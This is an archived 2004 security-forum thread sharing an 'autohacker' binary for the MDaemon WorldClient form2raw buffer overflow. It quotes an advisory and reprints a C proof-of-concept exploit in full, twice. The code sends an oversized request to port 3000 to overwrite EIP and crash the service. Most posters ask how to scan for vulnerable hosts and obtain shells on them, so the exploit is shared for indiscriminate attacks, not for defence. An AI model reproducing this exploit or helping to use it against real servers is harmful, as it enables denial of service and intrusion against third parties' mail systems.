Dmaeon Autohacker / Pre Autohacker

Help - Search - Member List - Calendar

Full Version: Dmaeon Autohacker / Pre Autohacker

GovernmentSecurity.org > The Archives > Public Downloads

rscience

Mar 6 2004, 09:27 PM

have nice fun

Progressor

Mar 6 2004, 09:34 PM

Interesting... what is this exploit?

sylver

Mar 6 2004, 09:42 PM

how to scan this?
never heard of this........

Paul

Mar 6 2004, 10:15 PM

Dmaeon ??
Only found 3 matches on google.

wicked

Mar 6 2004, 10:42 PM

nice one....

Wkd..

#WkdScience

technoboy

Mar 6 2004, 10:58 PM

imho its mdaemon

sylver

Mar 6 2004, 11:04 PM

i have found out that dmaeon listen on port 3000
but what does this exploit?
have read that comes a shell on port 9999?????
but dont know exactly....

crash3rzz

Mar 6 2004, 11:31 PM

hmm i think its some sourt of mail server

M-DAEMON ? hmm weird

DarkAngel52457

Mar 7 2004, 02:50 AM

thanks

how to scan this ??????

andydis

Mar 7 2004, 02:53 AM

m-daemon, mail server, exloit is for the web based email (eqivlient to Outlook web access), originallyt made by deerfield (makers of wingate www.deerfield.com)

rscience, i get the zip is corrupt,,,, repost?¿¿

rscience

Mar 7 2004, 06:17 AM

yep thats TRUE this exploit working on 3000 port.

andydis ( zip is NO corrupt ) TRY download one more time.

kenshin_efx

Mar 7 2004, 06:19 AM

10x for share man, i will check them.

Buluemoon

Mar 7 2004, 06:53 AM

getting the same error that the file is not valid archive, have dled 6-7 times , will try later. Thanks never the less rscience.

Copkill

Mar 7 2004, 07:42 AM

hmm i have no luck with this exploit

no shell founds.

h3llraz0r

Mar 7 2004, 09:14 AM

found this info on it

CODE

ALT-N MDaemon Raw Message Handler Buffer Overflow
Affected: ALT-N MDaemon 6.52 through 6.85
Description:
The MDaemon Mail Server package includes a web-based email component
called "WorldClient". The WorldClient web server uses a default port of
3000/tcp and allows remote access to a CGI program called
"form2raw.exe". This program allows users to create and send email
messages by typing the relevant information into a web-based form.
Specifically, the program accepts form data and uses it to create an
email message that is written directly to MDaemon's raw message queue.
A problem arises because "form2raw" can be forced to generate a
specially crafted message that, when processed by the mail server,
causes a stack-based buffer overflow. Remote attackers can exploit the
flaw to execute arbitrary code with the privileges of the MDaemon
process, possibly Local System. The advisory shows how to craft a web
request that causes "form2raw" to generate a malformed email message.
Status: The vendor has reportedly confirmed the problem and plans to
release a patch. The suggested workaround is to disable "form2raw"
functionality on the web server.
Council Site Actions:
The affected software is not in production or widespread use at any of
the council sites. They reported that no action was necessary.
References:
Posting by the Hat-Squad Security Team
http://archives.neohapsis.com/archives/bugtraq/2003-12/0331.html
WorldClient Product Page
http://www.altn.com/Products/WorldClient.asp
Background on MDaemon Configuration
http://files.altn.com/HowTo/MDaemonInstallation.html
SecurityFocus BID
Not yet available.

#include <windows.h>
#include <stdio.h>
#include <winsock.h>
#pragma comment (lib,"ws2_32")
#define PORT 3000
void main(int argc, char **argv)
{
SOCKET s = 0;
WSADATA wsaData;

if(argc < 2)
{
fprintf(stderr, "MDaemon form2raw.cgi Exploit Written by Behrang Fouladi, " \
"\nUsage: %s <target ip> \n", argv[0]);

printf("%d",argc);
exit(0);
}

WSAStartup(MAKEWORD(2,0), &wsaData);

s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

if(INVALID_SOCKET != s)
{
SOCKADDR_IN anAddr;
anAddr.sin_family = AF_INET;
anAddr.sin_port = htons(PORT);
anAddr.sin_addr.S_un.S_addr = inet_addr(argv[1]);

if(0 == connect(s, (struct sockaddr *)&anAddr, sizeof(struct sockaddr)))
{
static char buffer[500];
int i;
memset(buffer,0,sizeof(buffer));
strcpy(buffer,"get /form2raw.cgi?From=");
for(i=0;i<244;i++) {

strcat(buffer,"a");
}

strcat(buffer,"bbbb"); //Overwrites EIP
strcat(buffer,"c"); //One byte left after ESP :-(
strcat(buffer,"&To=me@hell.org&Subject=hi&Body=hello HTTP/1.0\r\n\r\n");

send(s, buffer, strlen(buffer), 0);
printf("Exploit Sent.");

}

else printf("Error Connecting to The Target.\n");
closesocket(s);
}

WSACleanup();
}

Deltax

Mar 7 2004, 09:49 AM

te .zip is corrupted man

/edit

unpack it with winrar and it works fine

thanks m8 good work

dmaeon <ip>
exploit send

and what now? how to connect to the server?

BuzzDee

Mar 7 2004, 10:39 AM

rsience could u plz post the source of the exploit? because if this exploit is the compiled version of the poc-exploit which h3llraz0r posted nothing will happen

theres no shellcode in it... but if ur exploit already contains shellcode does it spawn a shell?

greetz

usch

Mar 7 2004, 10:54 AM

well i`ve never seen an autohacker for a DOS exploit
by the way hi Buzzdee it`s me tjarx

regards

Helloman

Mar 7 2004, 12:13 PM

thx for this Exploit, but can you tell more about it.

Had somebody a shell?

is it really Port 9999 or on which port i must listen to become a shell?

tazthedev

Mar 7 2004, 03:02 PM

I got tons of results..... but how can i connect to them ????

SkyRaVeR

Mar 7 2004, 10:29 PM

yeah mate - first of all th@nx 4 sharing.. but doesn't look like shellcode included.. where should the shell spawn ??

greetz, ´sky

Diablotic

Mar 8 2004, 01:11 PM

There is no shellcode? ;/
It could be betterr...

adenek

Mar 8 2004, 02:55 PM

hello, i am ok with the other, this autohacker need a little more information, what is the port exploit ' 3000 ???? and what port must be lisend for the shell .

thx in advance

Zero-X

Mar 8 2004, 09:47 PM

same has all once the packet is send.. Wehre you get the shell / how you get it .. ?

-ZX

maxxis

Mar 14 2004, 02:16 AM

only dos exploit ;P

eXist

Mar 14 2004, 06:01 AM

There is NO shellcode in this exploit yet. Jeez, read the examples, as provided by h3llraz0r:

CODE

#include <windows.h>
#include <stdio.h>
#include <winsock.h>
#pragma comment (lib,"ws2_32")
#define PORT 3000
void main(int argc, char **argv)
{
SOCKET s = 0;
WSADATA wsaData;

if(argc < 2)
{
fprintf(stderr, "MDaemon form2raw.cgi Exploit Written by Behrang Fouladi, " \
"\nUsage: %s <target ip> \n", argv[0]);

printf("%d",argc);
exit(0);
}

WSAStartup(MAKEWORD(2,0), &wsaData);

s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

if(INVALID_SOCKET != s)
{
SOCKADDR_IN anAddr;
anAddr.sin_family = AF_INET;
anAddr.sin_port = htons(PORT);
anAddr.sin_addr.S_un.S_addr = inet_addr(argv[1]);

if(0 == connect(s, (struct sockaddr *)&anAddr, sizeof(struct sockaddr)))
{
static char buffer[500];
int i;
memset(buffer,0,sizeof(buffer));
strcpy(buffer,"get /form2raw.cgi?From=");
for(i=0;i<244;i++) {

strcat(buffer,"a");
}

strcat(buffer,"bbbb"); //Overwrites EIP
strcat(buffer,"c"); //One byte left after ESP :-(
strcat(buffer,"&To=me@hell.org&Subject=hi&Body=hello HTTP/1.0\r\n\r\n");

send(s, buffer, strlen(buffer), 0);
printf("Exploit Sent.");

}

else printf("Error Connecting to The Target.\n");
closesocket(s);
}

WSACleanup();
}

Do you see a returns address or shellcode of any sort...no, you don't. Either code one in yourself or wait for one to come along, if you're lucky.

XeLoRy

Mar 18 2004, 08:44 PM

it's a godd exploit, i have test his, it's exellent

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.